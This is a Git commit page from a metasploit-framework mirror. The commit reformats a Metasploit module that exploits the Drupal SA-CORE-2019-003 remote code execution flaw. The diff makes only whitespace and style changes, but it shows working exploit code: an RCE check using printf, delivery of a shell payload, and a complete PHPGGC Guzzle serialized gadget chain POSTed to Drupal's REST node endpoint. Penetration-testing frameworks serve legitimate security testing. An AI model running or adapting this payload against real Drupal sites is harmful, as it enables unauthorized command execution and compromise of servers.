infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Code smells and documentation

master
rotemreiss 2019-02-25 15:21:46 -05:00 committed by GitHub
parent 54ce49c4e6
commit edf7c41478
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 20 additions and 25 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

45
modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb
View File

@ -62,7 +62,7 @@ class MetasploitModule < Msf::Exploit::Remote
return CheckCode::Unknown
end
# Generate random string to validate if the RCE worked
# Generate random string to validate if the RCE worked
token = Rex::Text.rand_text_alphanumeric(8..42)
res = execute_command("printf #{token}")
@ -91,7 +91,7 @@ class MetasploitModule < Msf::Exploit::Remote
# Try to get shell
execute_command(payload.encoded)
sleep(2)
return if session_created?
@ -103,7 +103,7 @@ class MetasploitModule < Msf::Exploit::Remote
res = exploit_drupal8(cmd)
if res && res.code == 422
print_error "Exploit failed, in case that VHOST was not defined, consider to set that option"
print_error "Exploit failed, in case that VHOST was not defined, consider to set that option"
end
if res && res.code != 403
@ -121,10 +121,10 @@ class MetasploitModule < Msf::Exploit::Remote
# Custom implementation of full_uri to take the vhost if exists, since the exploit may not work when using IP
# @see full_uri
def vhost_full_uri
host = "#{datastore['VHOST']}" || "#{rhost}"
if !datastore['VHOST']
print_warning "The exploit may not work when using IP instead of host name, consider to set VHOST option"
end
host = "#{datastore['VHOST']}" || "#{rhost}"
if !datastore['VHOST']
print_warning "The exploit may not work when using IP instead of host name, consider to set VHOST option"
end
uri_scheme = ssl ? 'https' : 'http'
uri_port = rport.to_s == '80' ? '' : ":#{rport}"
@ -137,28 +137,24 @@ class MetasploitModule < Msf::Exploit::Remote
uri = normalize_uri(target_uri.path, 'node')
# @todo Support other formats ?
vars_get = {
'_format' => 'hal_json'
}
vars_get = {'_format' => 'hal_json'}
# Get the command length for the payload
cmd_len = cmd.length.to_s
data = {
"link" => [
{
"value" => "link",
# The payload was generated using PHPGGC: `./phpggc guzzle/rce1 system id --json`
# @see https://www.ambionics.io/blog/drupal8-rce
"options" => "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:#{cmd_len}:\"#{cmd}\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}"
}
],
"_links" => {
"type" => {
"href" => "#{vhost_full_uri}rest/type/shortcut/default"
}
}
}
"link" => [{
"value" => "link",
# The payload was generated using PHPGGC: `./phpggc guzzle/rce1 system id --json`
# @see https://www.ambionics.io/blog/drupal8-rce
"options" => "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:#{cmd_len}:\"#{cmd}\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}"
}],
"_links" => {
"type" => {
"href" => "#{vhost_full_uri}rest/type/shortcut/default"
}
}
}
send_request_cgi(
'method' => 'POST',
@ -168,5 +164,4 @@ class MetasploitModule < Msf::Exploit::Remote
'data' => data.to_json
)
end
end